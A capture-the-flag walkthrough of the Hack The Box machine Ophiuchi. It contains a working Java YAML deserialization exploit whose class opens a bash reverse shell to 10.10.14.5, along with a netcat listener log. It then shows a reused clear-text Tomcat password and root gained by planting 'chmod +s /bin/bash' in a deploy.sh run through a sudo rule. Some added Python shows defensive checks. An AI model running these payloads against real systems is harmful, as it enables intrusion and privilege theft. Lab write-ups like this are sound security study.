Hack-The-Box-walkthrough[Ophiuchi]

introduction

OS: Linux
Difficulty: Medium
Points: 30
Release: 13 Feb 2021
IP: 10.10.10.227

information gathering

First, run nmap as usual:

┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# nmap -sV -v -p- --min-rate=10000 10.10.10.227
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
8080/tcp open http Apache Tomcat 9.0.38
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

get user

On port 8080 Tomcat serves an "Online YAML Parser", which hands whatever we submit to a Java YAML library.

A quick search turns up a ready-made exploit for this kind of Java YAML deserialization:

  • yaml-payload

Download the exploit, then change src/artsploit/AwesomeScriptEngineFactory.java to the following (only the command in the constructor needs editing; the interface stubs can stay as they are):

package artsploit;

import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;

// ScriptEngineManager discovers ScriptEngineFactory implementations through
// ServiceLoader, so this constructor runs as soon as the class is loaded from
// our web server; that is where the reverse shell is launched.
public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() {
        String[] cmd = {"bash", "-c", "bash -i >& /dev/tcp/10.10.14.5/9001 0>&1"};
        String[] jex = {"bash", "-c", "{echo,$(echo -n $cmd | base64)}|{base64,-d}|{bash,-i}"};
        try {
            // this exec is what opens the reverse shell; the two below are
            // leftovers ($cmd is a Java variable, not a shell one) and do nothing useful
            Runtime.getRuntime().exec(cmd);
            Runtime.getRuntime().exec(jex);
            Runtime.getRuntime().exec("echo $jex");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

    // The remaining methods only exist to satisfy the interface.
    @Override
    public String getEngineName() { return null; }

    @Override
    public String getEngineVersion() { return null; }

    @Override
    public List<String> getExtensions() { return null; }

    @Override
    public List<String> getMimeTypes() { return null; }

    @Override
    public List<String> getNames() { return null; }

    @Override
    public String getLanguageName() { return null; }

    @Override
    public String getLanguageVersion() { return null; }

    @Override
    public Object getParameter(String key) { return null; }

    @Override
    public String getMethodCallSyntax(String obj, String m, String... args) { return null; }

    @Override
    public String getOutputStatement(String toDisplay) { return null; }

    @Override
    public String getProgram(String... statements) { return null; }

    @Override
    public ScriptEngine getScriptEngine() { return null; }
}

Compile the class and serve the src directory over HTTP. That directory also holds the repo's META-INF/services/javax.script.ScriptEngineFactory file, which is how ServiceLoader finds our class once the target's ScriptEngineManager scans the URL we hand it:

javac src/artsploit/AwesomeScriptEngineFactory.java
cd src
python3 -m http.server 80

Trigger the exploit: open the YAML parser at http://10.10.14.5:8080/ and submit the following document, which makes the target's ScriptEngineManager load our factory from the web server we just started:

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.5/"]
]]
]
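Why this works, and how a defender would catch it: the parser turns explicit !! tags into Java class instantiations, and javax.script.ScriptEngineManager then loads every ScriptEngineFactory registered on the given URLClassLoader, running its constructor. On the Java side the fix is a safe constructor (SnakeYAML's SafeConstructor, which is what payloads of this family target) that resolves only core-schema tags. The script below is an added example, not part of the walkthrough or of the parser app: a textual pre-filter that rejects any document carrying an explicit tag outside the core schema, run over a constructed copy of the payload above and a benign document.

```python
"""Pre-parse gate for YAML submitted to a Java-backed parser (added example).
Rejects any document with an explicit tag outside the YAML core schema, since a
non-safe constructor turns such tags into Java class instantiations."""
import re

# Tags a safe constructor resolves on its own (YAML 1.1 core / JSON types).
SAFE_TAGS = frozenset({
    "str", "int", "float", "bool", "null", "seq", "map", "set", "omap",
    "pairs", "binary", "timestamp", "merge", "value",
})

# Long form "!<tag:yaml.org,2002:name>", or short form "!!name" / "!name".
TAG_RE = re.compile(r"!<tag:yaml\.org,2002:([^>]+)>|(!!?)([A-Za-z_][^\s\[\]{},]*)")


def explicit_tags(yaml_text):
    """Yield (line_no, raw_tag, tag_name, is_global) for every explicit tag."""
    for line_no, line in enumerate(yaml_text.splitlines(), start=1):
        for m in TAG_RE.finditer(line):
            if m.group(1) is not None:
                yield line_no, m.group(0), m.group(1), True
            else:
                yield line_no, m.group(0), m.group(3), m.group(2) == "!!"


def unsafe_tags(yaml_text):
    """[(line_no, raw_tag)] for tags a safe loader would refuse: global tags
    outside SAFE_TAGS (Java class names look exactly like these) and every
    application-local '!name' tag, which also maps to a custom constructor."""
    return [
        (line_no, raw)
        for line_no, raw, tag, is_global in explicit_tags(yaml_text)
        if not (is_global and tag in SAFE_TAGS)
    ]


def accept(yaml_text):
    """Gate decision: True only when the document carries no unsafe tag.
    This is a textual pre-filter (it may also flag a '!' inside a quoted
    scalar); the real fix is parsing with a safe constructor."""
    return not unsafe_tags(yaml_text)


# Constructed samples: the gadget chain from the walkthrough and a benign doc.
PAYLOAD = """\
!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.5/"]
]]
]
"""
BENIGN = """\
name: !!str 123
released: !!timestamp 2021-02-13
ports: [22, 8080]
"""

if __name__ == "__main__":
    for label, doc in (("payload", PAYLOAD), ("benign", BENIGN)):
        verdict = "accepted" if accept(doc) else "rejected"
        print(f"{label}: {verdict} {unsafe_tags(doc)}")
```

The gate is meant to sit in front of the parser, not replace it: a safe constructor is still required, because tags are only one way a non-safe loader can be driven.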

Privilege escalation from tomcat to admin: catch the reverse shell on the listener, then grep the Tomcat configuration for passwords. tomcat-users.xml holds the admin credential in clear text, and the same password works for the local admin account:

┌──(root💀kali)-[~]
└─# nc -lvp 9001
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.227.
Ncat: Connection from 10.10.10.227:58294.
bash: cannot set terminal process group (815): Inappropriate ioctl for device
bash: no job control in this shell
tomcat@ophiuchi:/$ id
whoid
uid=1001(tomcat) gid=1001(tomcat) groups=1001(tomcat)
tomcat@ophiuchi:/$ ami
whoami
tomcat
tomcat@ophiuchi:/$ cd ~
cd ~
tomcat@ophiuchi:~$ ls
ls
bin
BUILDING.txt
conf
CONTRIBUTING.md
lib
LICENSE
logs
NOTICE
README.md
RELEASE-NOTES
RUNNING.txt
temp
webapps
work
tomcat@ophiuchi:~$ cd conf
cd conf
tomcat@ophiuchi:~/conf$ ls
ls
catalina.policy
catalina.properties
context.xml
jaspic-providers.xml
jaspic-providers.xsd
logging.properties
server.xml
tomcat-users.xml
tomcat-users.xsd
web.xml
tomcat@ophiuchi:~/conf$ cat * | grep pass
cat * | grep pass
# passed to checkPackageAccess unless the
# passed to checkPackageDefinition unless the
analyzes the HTTP headers included with the request, and passes them
<!-- Use the LockOutRealm to prevent attempts to guess user passwords
<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>
you must define such a user - the username and password are arbitrary. It is
them. You will also need to set the passwords to something appropriate.
<user username="tomcat" password="<must-be-changed>" roles="tomcat"/>
<user username="both" password="<must-be-changed>" roles="tomcat,role1"/>
<user username="role1" password="<must-be-changed>" roles="role1"/>
<xs:attribute name="password" type="xs:string" />
<!-- pass the result to this style sheet residing -->
<!-- pass the result to this style sheet which is -->
<!-- work-around various issues when Java passes -->
<!-- headers passed to the CGI process as -->
<!-- passShellEnvironment Should the shell environment variables (if -->
<!-- any) be passed to the CGI script? [false] -->
<mime-type>application/vnd.blueice.multipass</mime-type>
tomcat@ophiuchi:~/conf$ su admin
su admin
Password: whythereisalimit
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
whoami
admin
python -c 'import pty; pty.spawn("/bin/bash")'
bash: line 3: python: command not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
admin@ophiuchi:/opt/tomcat/conf$ id
id
uid=1000(admin) gid=1000(admin) groups=1000(admin)

Then grab the user flag:

admin@ophiuchi:/opt/tomcat/conf$ cd
cd
admin@ophiuchi:~$ ls
ls
user.txt
admin@ophiuchi:~$ cat user.txt
cat user.txt
4985ea2805b1c7ee8adca11a4f0b0b39

get root

┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# ssh admin@10.10.10.227
The authenticity of host '10.10.10.227 (10.10.10.227)' can't be established.
ECDSA key fingerprint is SHA256:OmZ+JsRqDVNaBWMshp7wogZM0KhSKkp1YmaILhRxSY0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.227' (ECDSA) to the list of known hosts.
admin@10.10.10.227's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun 14 Feb 2021 08:42:54 AM UTC

System load: 0.0
Usage of /: 20.4% of 27.43GB
Memory usage: 18%
Swap usage: 0%
Processes: 219
Users logged in: 0
IPv4 address for ens160: 10.10.10.227
IPv6 address for ens160: dead:beef::250:56ff:feb9:1c49


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Sat Feb 13 19:55:31 2021 from 10.10.14.17
admin@ophiuchi:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go

Download main.wasm from the target:

  1. start a listener on your machine:

┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# nc -lvnp 9002 > main.wasm
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.227.
Ncat: Connection from 10.10.10.227:55062.
  2. send the file from the target:

admin@ophiuchi:~$ cat /opt/wasm-functions/main.wasm > /dev/tcp/10.10.14.5/9002

Analyze and modify the file:

  1. upload main.wasm at https://webassembly.github.io/wabt/demo/wasm2wat/index.html to get the text form

  2. in the info function change (i32.const 0) to (i32.const 1) and copy the resulting text:

    (module
    (type $t0 (func (result i32)))
    (func $info (export "info") (type $t0) (result i32)
    (i32.const 1))
    (table $T0 1 1 funcref)
    (memory $memory (export "memory") 16)
    (global $g0 (mut i32) (i32.const 1048576))
    (global $__data_end (export "__data_end") i32 (i32.const 1048576))
    (global $__heap_base (export "__heap_base") i32 (i32.const 1048576)))
  3. paste the code at https://webassembly.github.io/wabt/demo/wat2wasm/index.html

  4. click on download

  5. transfer the downloaded file to a writable directory on the target

  6. create deploy.sh next to it and run the sudo command. Serve the patched file from your machine:

┌──(root💀kali)-[~/hackthebox/machine/ophiuchi]
└─# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.227 - - [14/Feb/2021 04:02:19] "GET /test.wasm HTTP/1.1" 200 -
cd /tmp
# index.go reads main.wasm and deploy.sh from the current directory
echo "chmod +s /bin/bash" > deploy.sh
wget http://10.10.14.5/test.wasm -O main.wasm
chmod 777 *
sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
# -p keeps the effective uid of the setuid bash
/bin/bash -p
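What the wasm2wat/wat2wasm round trip really changes is a single byte in the module's code section. The script below is an added example, not code from the box or from wabt: a small parser for the WebAssembly binary format that lists a module's exports and reports any exported function whose body is just i32.const N followed by end, which is the shape of the info export here. Because the real main.wasm is not reproduced on the page, build_module() constructs a sample with the same sections and exports as the .wat above (the 1048576 globals, the 16-page memory, the info function), once returning 0 and once returning 1; the function-index handling assumes the module imports no functions, which holds for this layout.

```python
# Minimal WebAssembly binary-format inspector (added example, not the box's code).
MAGIC = b"\0asm\x01\x00\x00\x00"                       # magic bytes + version 1
EXPORT_KINDS = {0: "func", 1: "table", 2: "memory", 3: "global"}

def uleb(n):                                           # unsigned LEB128 encode
    out = bytearray()
    while True:
        byte, n = n & 0x7F, n >> 7
        out.append(byte | 0x80 if n else byte)
        if not n:
            return bytes(out)

def sleb(n):                                           # signed LEB128 encode
    out = bytearray()
    while True:
        byte, n = n & 0x7F, n >> 7
        done = (n == 0 and not byte & 0x40) or (n == -1 and byte & 0x40)
        out.append(byte if done else byte | 0x80)
        if done:
            return bytes(out)

def read_leb(buf, pos, signed=False):                  # LEB128 decode -> (value, new pos)
    result = shift = 0
    while True:
        byte, pos = buf[pos], pos + 1
        result |= (byte & 0x7F) << shift
        shift += 7
        if not byte & 0x80:
            if signed and byte & 0x40:
                result -= 1 << shift
            return result, pos

def vec(items): return uleb(len(items)) + b"".join(items)
def section(sid, payload): return bytes([sid]) + uleb(len(payload)) + payload
def name(s): return uleb(len(s.encode())) + s.encode()

def build_module(info_value):
    """Constructed sample with the same layout as the box's main.wasm."""
    glob = lambda mut, v: b"\x7f" + bytes([mut]) + b"\x41" + sleb(v) + b"\x0b"
    body = vec([]) + b"\x41" + sleb(info_value) + b"\x0b"   # no locals; i32.const N; end
    return (MAGIC
            + section(1, vec([b"\x60\x00\x01\x7f"]))         # type 0: () -> i32
            + section(3, vec([uleb(0)]))                      # func 0 has type 0
            + section(4, vec([b"\x70\x01\x01\x01"]))          # table: funcref, min 1, max 1
            + section(5, vec([b"\x00" + uleb(16)]))           # memory: 16 pages, no max
            + section(6, vec([glob(1, 1048576), glob(0, 1048576), glob(0, 1048576)]))
            + section(7, vec([name("info") + b"\x00" + uleb(0),
                              name("memory") + b"\x02" + uleb(0),
                              name("__data_end") + b"\x03" + uleb(1),
                              name("__heap_base") + b"\x03" + uleb(2)]))
            + section(10, vec([uleb(len(body)) + body])))

def parse_sections(buf):
    if buf[:8] != MAGIC:
        raise ValueError("not a WebAssembly v1 module")
    pos, sections = 8, {}
    while pos < len(buf):
        sid = buf[pos]
        size, pos = read_leb(buf, pos + 1)
        sections.setdefault(sid, []).append(buf[pos:pos + size])   # custom (id 0) may repeat
        pos += size
    return sections

def parse_exports(payload):
    count, pos = read_leb(payload, 0)
    exports = []
    for _ in range(count):
        length, pos = read_leb(payload, pos)
        label = payload[pos:pos + length].decode()
        kind, pos = payload[pos + length], pos + length + 1
        index, pos = read_leb(payload, pos)
        exports.append((label, EXPORT_KINDS.get(kind, kind), index))
    return exports

def parse_code(payload):
    count, pos = read_leb(payload, 0)
    bodies = []
    for _ in range(count):
        size, pos = read_leb(payload, pos)
        bodies.append(payload[pos:pos + size])
        pos += size
    return bodies

def constant_return(body):
    """N if the body is `i32.const N; end` after its local declarations, else None."""
    groups, pos = read_leb(body, 0)
    for _ in range(groups):                            # each group: count + valtype byte
        pos = read_leb(body, pos)[1] + 1
    if body[pos] != 0x41:
        return None
    value, pos = read_leb(body, pos + 1, signed=True)
    return value if body[pos:] == b"\x0b" else None

def inspect_module(buf):
    """(exports, {name: constant}); assumes no imported funcs, so func index == code index."""
    sections = parse_sections(buf)
    exports = parse_exports(sections[7][0]) if 7 in sections else []
    bodies = parse_code(sections[10][0]) if 10 in sections else []
    flags = {label: constant_return(bodies[index]) for label, kind, index in exports
             if kind == "func" and index < len(bodies)}
    return exports, {k: v for k, v in flags.items() if v is not None}
```

On a captured module, inspect_module(open("main.wasm", "rb").read()) prints the exports and the constant, so someone reviewing a sudo rule like this one can confirm what the module returns without pasting it into a browser demo.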

And now we are root:

admin@ophiuchi:/tmp$ ls
deploy.sh systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-logind.service-Y5t4mf vmware-root_667-3980363901
hsperfdata_tomcat systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-resolved.service-lBxjmi wasm-functions
main.wasm systemd-private-64051d8f15f4418cbb11018667bc15ad-systemd-timesyncd.service-RVvCVh
admin@ophiuchi:/tmp$ sudo -u root /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy

admin@ophiuchi:/tmp$ /bin/bash -p
bash-5.0# id
uid=1000(admin) gid=1000(admin) euid=0(root) egid=0(root) groups=0(root),1000(admin)
bash-5.0# whoami
root
bash-5.0# cd
bash-5.0# ls
user.txt
bash-5.0# cd /root
bash-5.0# ls
go root.txt snap
bash-5.0# cat root.txt
5296450d942ebf2bd9763b2431f7f1d5
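What made the sudo rule exploitable is visible in the steps above, even though index.go itself is not shown on the page: the program resolves main.wasm and deploy.sh relative to the current directory, and sudo lets admin choose that directory, so a user-writable path such as /tmp supplies both files. Anything run with elevated privileges should locate its helper files against a fixed directory and refuse them unless the whole path is root-owned and writable by nobody else. The Python below is an added example of that check, not the box's code, and a Python rendering of what the Go program would need to do; the layout its demo builds under a temp dir is constructed, and trusted_uids defaults to root but is parameterised so the demo can run unprivileged.

```python
"""Trusted-path check for helper files executed by a privileged program (added example)."""
import os
import stat


def trusted_path(path, trust_root="/", trusted_uids=frozenset({0})):
    """None if `path` may be run with elevated privileges, else a short reason.
    Trusted means: absolute, under `trust_root`, and every component from
    `trust_root` down to the file is not a symlink, is owned by a trusted uid
    and is writable by neither group nor others.  Leave trusted_uids at root
    in production; it is a parameter only so the demo can run unprivileged."""
    if not os.path.isabs(path):
        return "relative path: it would be resolved against the caller's cwd"
    root = os.path.abspath(trust_root)
    chain, cur = [], os.path.abspath(path)
    while cur != root:
        chain.append(cur)
        parent = os.path.dirname(cur)
        if parent == cur:                          # reached "/" without meeting root
            return f"{path} is not under {root}"
        cur = parent
    chain.append(root)
    for comp in reversed(chain):                   # top-down: report the first weak link
        try:
            st = os.lstat(comp)
        except OSError as exc:
            return f"{comp}: {exc}"
        if stat.S_ISLNK(st.st_mode):
            return f"{comp} is a symlink"
        if st.st_uid not in trusted_uids:
            return f"{comp} is owned by uid {st.st_uid}"
        if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
            return f"{comp} is group- or world-writable"
    return None


def resolve_helper(program_dir, helper, trust_root="/", trusted_uids=frozenset({0})):
    """Resolve `helper` next to the program instead of in the caller's cwd,
    and refuse it unless the whole path passes trusted_path()."""
    candidate = os.path.join(program_dir, helper)
    reason = trusted_path(candidate, trust_root, trusted_uids)
    if reason is not None:
        raise PermissionError(reason)
    return candidate


if __name__ == "__main__":
    # Constructed demo: one clean helper, one planted in a sticky world-writable dir.
    import tempfile
    base = tempfile.mkdtemp()
    os.chmod(base, 0o755)
    drop = os.path.join(base, "drop")
    os.mkdir(drop)
    os.chmod(drop, 0o1777)
    for rel in ("deploy.sh", "drop/deploy.sh"):
        full = os.path.join(base, rel)
        with open(full, "w") as fh:
            fh.write("#!/bin/sh\necho deploy\n")
        os.chmod(full, 0o755)
        print(rel, "->", trusted_path(full, base, {os.getuid()}))
```

From a real sudo-launched program, keep trust_root at "/" so that a world-writable ancestor such as /tmp is rejected as well; the demo narrows it to the temp dir only because /tmp itself would (correctly) fail the check.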

Summary of knowledge

  • modify yaml-payload to get a reverse shell through the Online YAML Parser
  • Tomcat credential leak: clear-text password in tomcat-users.xml, reused by the admin account
  • .wasm file analysis and modification (wasm2wat, edit, wat2wasm)
  • privesc through the NOPASSWD sudo rule for /usr/bin/go run index.go

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…